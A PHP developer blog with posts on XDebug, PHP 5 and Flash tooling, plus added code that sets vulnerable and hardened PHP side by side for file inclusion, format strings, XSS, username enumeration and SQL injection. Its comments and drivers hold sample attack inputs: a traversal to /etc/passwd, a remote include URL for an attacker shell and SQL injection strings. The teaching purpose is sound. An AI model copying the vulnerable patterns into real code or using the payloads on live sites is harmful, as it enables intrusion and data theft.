Is your Web application secure?

“No language can prevent insecure code, although there are language features which could aid or hinder a security-conscious developer.”

An interesting article on SecurityFocus walks through examples of vulnerable PHP code and how each vulnerability is exploited.
The attacks explained in the article are:
1. Remote code execution
2. SQL injection
3. Format string vulnerabilities
4. Cross Site Scripting (XSS)
5. Username enumeration
http://www.securityfocus.com/infocus/1864
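As an added example (my own code, not taken from the SecurityFocus article), here are four of the five patterns in PHP, each written once the vulnerable way and once hardened. SQL injection is not covered in this snippet. All function names and inputs are constructed for the demonstration; it runs from the command line without a web server.

```php
<?php
// Added example, not the SecurityFocus article's code. For four of the five
// attack classes, a vulnerable pattern next to a hardened rewrite. Inputs are
// constructed inline so the file runs as: php php_vulns.php

// 1. Remote code execution: letting the request choose the file to include().
//    ?page=../../../../etc/passwd or, with allow_url_fopen=On,
//    ?page=http://attacker/shell.txt? both end up as the include() argument.
function page_path_vulnerable($page) {
    return "pages/$page.php";           // the caller would pass this to include()
}
function page_path_hardened($page) {
    // Allow-list the page names; never build an include path from raw input.
    $allowed = array('home' => 1, 'about' => 1, 'contact' => 1);
    return isset($allowed[$page]) ? "pages/$page.php" : 'pages/home.php';
}

// 3. Format string: user data used as the printf()/sprintf() format itself.
function greet_vulnerable($name) {
    try {
        return sprintf("Welcome, $name");   // a "%s" inside $name is a conversion
    } catch (Throwable $e) {                // PHP 8 throws ArgumentCountError;
        return 'error: ' . get_class($e);   // PHP 5 returned false with a warning
    }
}
function greet_hardened($name) {
    return sprintf('Welcome, %s', $name);   // data is an argument, not the format
}

// 4. Cross-site scripting: echoing input into HTML without encoding it.
function comment_vulnerable($text) {
    return "<p>$text</p>";
}
function comment_hardened($text) {
    // ENT_QUOTES also encodes ' so the value is safe in single-quoted attributes.
    return '<p>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</p>';
}

// 5. Username enumeration: a login whose error text reveals whether the
//    account exists. $users maps name => password_hash() output (constructed).
function login_vulnerable(array $users, $user, $pass) {
    if (!isset($users[$user])) {
        return 'Unknown user';                // tells the attacker the name is free
    }
    if (!password_verify($pass, $users[$user])) {
        return 'Wrong password';              // ... and this one that it exists
    }
    return 'Logged in';
}
function login_hardened(array $users, $user, $pass) {
    // Same message either way, and a hash check is done even for unknown names
    // so that the response time does not leak the answer instead of the text.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('dummy-not-a-real-password', PASSWORD_DEFAULT);
    }
    $hash = isset($users[$user]) ? $users[$user] : $dummy;
    $ok = password_verify($pass, $hash) && isset($users[$user]);
    return $ok ? 'Logged in' : 'Invalid username or password';
}

// Driver with constructed attacker inputs.
$users = array('alice' => password_hash('correct horse', PASSWORD_DEFAULT));

echo page_path_vulnerable('../../../../etc/passwd'), "\n";
echo page_path_hardened('../../../../etc/passwd'), "\n";
echo greet_vulnerable('Bob %s'), "\n";
echo greet_hardened('Bob %s'), "\n";
echo comment_vulnerable('<script>alert(1)</script>'), "\n";
echo comment_hardened('<script>alert(1)</script>'), "\n";
echo login_vulnerable($users, 'bob', 'x'), ' / ', login_vulnerable($users, 'alice', 'x'), "\n";
echo login_hardened($users, 'bob', 'x'), ' / ', login_hardened($users, 'alice', 'x'), "\n";
echo login_hardened($users, 'alice', 'correct horse'), "\n";
```

The hardened login deliberately spends a hash verification on unknown names as well: returning the same string is not enough if one branch answers in microseconds and the other in milliseconds.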

Debugging PHP with XDebug

These days, working with PHP again after a long time, I've installed this handy tool for debugging PHP (it supports both PHP 4 and 5).
XDebug is really useful for debugging PHP, which is usually not that easy to debug, and it is also easy to install.
It provides a lot of valuable debugging information, for example a full stack trace on errors, profiling of memory and CPU usage, function profiling, etc. Because those traces include file paths, line numbers and function arguments, load the extension on development machines only, never on a public server.
I really suggest taking a look at it!
Both Windows and Linux builds are available for download:
http://www.xdebug.org

PHP5: a big failure ?

What’s happening ?
PHP 5 has been presented as a revolution: a lot of new features have been added and a lot of projects have been built on it. But only a small group of hosting providers seem interested in supporting PHP 5 on their web servers. It is not so useful to have a beautiful programming language if we can't use it in production environments.
But what about the causes? Maybe they are related to the fact that Zend decided to support PHP 4 and 5 separately, allowing hosters to choose which version to compile on their web servers, or maybe to the fact that PHP 5 is not fully compatible with the older versions, and there are some security-related bugs that increase our doubts.
I'm using PHP 5 a lot in production environments, without any problem. It is quite fast and reliable, and has a lot of useful features that suit enterprise development perfectly. We MUST use PHP 5 to help it grow until it becomes the standard...
To conclude, I'd like to inform those who don't know it that the PHP team is working on the sixth version (yes... PHP 6... and it is available for download at snaps.php.net), which will add a lot of interesting features to the language, such as native Unicode support.
I hope there will be only one (working) version of PHP in the future...

Foundation PHP 5 for Flash

This book first appeared back in the days of Flash 5. A long time has elapsed since then (especially in computing terms).

Today I see that friends of ED have published a new edition of this book covering ActionScript 2.0, PHP 5 and MySQL 4.1.
Looking at the sample PDF chapter available, it seems quite well done, clear and simple to read (ok, it is the 2nd chapter and it covers very basic things...), but I noticed that it also deals with the things/problems that often come up when you use PHP and Flash every day, for example escape characters, magic_quotes_gpc, etc.
I think I'm going to get a copy of the book; it's always useful to keep my mind in exercise...

A pure Flash Blog. OpenSource!

The guys at Motion4graphics.com have developed a Flash blog (www.flashblog.org), I think the first open-source weblog made in Flash/PHP/MySQL.

The project is still in beta, but the main features are already included. As they say: "We wanted to extend the features little by little; we didn't want to reinvent the weblog."
Next there will be a feature to download all the archives.

The main features at the moment are:
– Front end developed in Flash.
– Back end developed in PHP/MySQL.
– Creation of categories.
– Searches.
– Limit on the number of entries per page.
– Extended entries (read more...).
– WYSIWYG editor.
– Multiple users and authors.
– Unlimited vertical stage.
– Back/forward buttons.
– FLA source files included.

JPEGs can be added, with the limitation of Flash, which can load only non-progressive JPEGs... maybe they could add GD support (or ImageMagick) to make all JPEGs compatible, and PNG too (while waiting for GIF support to come back in the GD library)?
I'm still trying to understand how the framework is set up and how data is transmitted to Flash (XML, Remoting or plain LoadVars)...
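As an added example of the GD approach mentioned above (my own code, not flashblog's), here is a small script that checks whether a JPEG is progressive and re-encodes it as a baseline JPEG. Decoding and re-encoding an upload through GD also throws away anything that is not pixel data (for instance a PHP payload hidden behind a .jpg extension), which is why a security reviewer wants uploaded images re-encoded anyway. File paths are assumptions; the script builds its own sample image so it runs offline with the GD extension.

```php
<?php
// Added example, not flashblog's code. Detect a progressive JPEG by scanning
// its markers, then re-encode it with GD as a baseline JPEG that the Flash
// player of the time can load. Requires ext/gd with JPEG support.

// Returns true (progressive), false (baseline/sequential) or null (not a JPEG
// or malformed). SOF2/6/10/14 (0xC2, 0xC6, 0xCA, 0xCE) mark progressive DCT.
function jpeg_is_progressive($path) {
    $data = file_get_contents($path);
    if ($data === false || substr($data, 0, 2) !== "\xFF\xD8") {
        return null;
    }
    $len = strlen($data);
    $pos = 2;
    while ($pos + 4 <= $len && ord($data[$pos]) === 0xFF) {
        $marker = ord($data[$pos + 1]);
        if ($marker === 0xFF) {                         // fill byte before a marker
            $pos++;
            continue;
        }
        if ($marker === 0x01 || ($marker >= 0xD0 && $marker <= 0xD8)) {
            $pos += 2;                                  // standalone markers, no length
            continue;
        }
        if ($marker === 0xDA || $marker === 0xD9) {
            return null;                                // SOS/EOI before any SOF
        }
        $isSof = $marker >= 0xC0 && $marker <= 0xCF
              && $marker !== 0xC4 && $marker !== 0xC8 && $marker !== 0xCC;
        if ($isSof) {
            return in_array($marker, array(0xC2, 0xC6, 0xCA, 0xCE), true);
        }
        $seglen = (ord($data[$pos + 2]) << 8) | ord($data[$pos + 3]);
        $pos += 2 + $seglen;
    }
    return null;
}

// Re-encode $src into $dst as a baseline JPEG. getimagesize() looks at the
// real header, so a file that is not a JPEG is refused whatever its name.
function jpeg_to_baseline($src, $dst, $quality = 85) {
    $info = @getimagesize($src);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        return false;
    }
    $im = @imagecreatefromjpeg($src);
    if ($im === false) {
        return false;
    }
    imageinterlace($im, 0);               // 0 = baseline, 1 = progressive
    $ok = imagejpeg($im, $dst, $quality);
    imagedestroy($im);
    return $ok;
}

// Self-test with a constructed image: write a progressive JPEG, convert it.
$tmp         = sys_get_temp_dir();
$progressive = "$tmp/sample-progressive.jpg";   // assumed scratch paths
$baseline    = "$tmp/sample-baseline.jpg";

$im = imagecreatetruecolor(64, 48);
imagefilledrectangle($im, 0, 0, 63, 47, imagecolorallocate($im, 200, 30, 30));
imageinterlace($im, 1);                  // force a progressive encoding
imagejpeg($im, $progressive, 85);
imagedestroy($im);

var_dump(jpeg_is_progressive($progressive));
var_dump(jpeg_to_baseline($progressive, $baseline));
var_dump(jpeg_is_progressive($baseline));
```

The first var_dump should report true and the last one false; the detector is what lets an upload handler skip the re-encode for files that are already baseline, although for untrusted uploads re-encoding everything is the safer default.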

It seems a really promising project; take a minute to look at it.

Installing PHP5 on Apache server

Today I was trying to install the new PHP 5 module on my local Apache server.
It's really simple, but while searching for instructions I discovered WAMP5, which includes in its installation:

  • Apache 1.3.31
  • PHP 5.0.0
  • MySQL 4.0.18
  • PhpMyAdmin 2.5.7
  • sqlitemanager

I installed it immediately 😉
Once installed you'll see a new tray icon with some options for your installed services.
I suggest it if you are thinking of installing PHP 5 on your local machine (I also have a separate Apache/PHP 4/MySQL 3 setup on my machine, so I can always switch between the two versions of PHP/MySQL).

PHP 5.0.0 Released!

Finally, after months of release candidates…
Some of the key features of PHP 5 include:

* The Zend Engine II with a new object model and dozens of new features.
* XML support has been completely redone in PHP 5, all extensions are now focused around the excellent libxml2 library (http://www.xmlsoft.org/).
* A new SimpleXML extension for easily accessing and manipulating XML as PHP objects. It can also interface with the DOM extension and vice-versa.
* A brand new built-in SOAP extension for interoperability with Web Services.
* A new MySQL extension named MySQLi for developers using MySQL 4.1 and later. This new extension includes an object-oriented interface in addition to a traditional interface; as well as support for many of MySQL’s new features, such as prepared statements.
* SQLite has been bundled with PHP. For more information on SQLite, please visit their website.
* Streams have been greatly improved, including the ability to access low-level socket operations on streams.
* And lots more…

http://www.php.net
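As an added example (my own code, not php.net's), here is the MySQLi prepared-statement support from the list above put to use, since it is the feature of PHP 5 that matters most for the SQL injection problem, and it also shows how to deal with the magic_quotes_gpc setting mentioned in the Foundation PHP 5 for Flash post. The same user lookup is written twice: once by pasting the request value into the SQL string, once with a bound parameter. The connection credentials and the users table are assumptions, so the script needs a reachable MySQL 4.1+ server set up with them.

```php
<?php
// Added example, not php.net's code. Assumes a MySQL 4.1+ server reachable
// with the credentials below and this table (assumed names, not from the page):
//   CREATE TABLE users (id INT PRIMARY KEY, name VARCHAR(64), email VARCHAR(128));

// PHP 4/5 with magic_quotes_gpc=On silently backslash-escape GET/POST/COOKIE
// data. That is not a defence (numeric and unquoted contexts are untouched)
// and it double-escapes values that a prepared statement binds correctly,
// so undo it once at the boundary. The function was removed in PHP 8, hence
// the function_exists() guard.
function request_value($name, $default = '') {
    if (!isset($_GET[$name])) {
        return $default;
    }
    $value = $_GET[$name];
    if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    return $value;
}

// Vulnerable: the value becomes part of the SQL text.
//   name=x' OR '1'='1            returns every row
//   name=x' UNION SELECT ... --  reads other tables
function find_user_vulnerable(mysqli $db, $name) {
    $sql = "SELECT id, name, email FROM users WHERE name = '$name'";
    $rows = array();
    $res = $db->query($sql);
    if ($res) {
        while ($row = $res->fetch_assoc()) {
            $rows[] = $row;
        }
        $res->free();
    }
    return $rows;
}

// Hardened: the SQL text is fixed at prepare() time; the value travels as a
// bound parameter and cannot change the statement's structure.
function find_user_hardened(mysqli $db, $name) {
    $stmt = $db->prepare('SELECT id, name, email FROM users WHERE name = ?');
    if (!$stmt) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $name);
    $stmt->execute();
    $stmt->bind_result($id, $uname, $email);   // bind_result() works without mysqlnd
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('id' => $id, 'name' => $uname, 'email' => $email);
    }
    $stmt->close();
    return $rows;
}

// Usage: php find_user.php  (the request is simulated via $_GET for the CLI)
$_GET['name'] = "x' OR '1'='1";                                   // constructed attacker input
$db = @new mysqli('localhost', 'app', 'app-password', 'appdb');  // assumed credentials
if (mysqli_connect_error()) {
    die('connect failed: ' . mysqli_connect_error() . "\n");
}
$name = request_value('name');
printf("string-built query returned %d rows\n", count(find_user_vulnerable($db, $name)));
printf("prepared statement returned %d rows\n", count(find_user_hardened($db, $name)));
$db->close();
```

With the attacker's value the first query returns the whole table, while the prepared statement looks for a user literally named `x' OR '1'='1` and returns nothing. Note that bind_param() only protects values; table and column names still cannot be bound and must come from an allow-list.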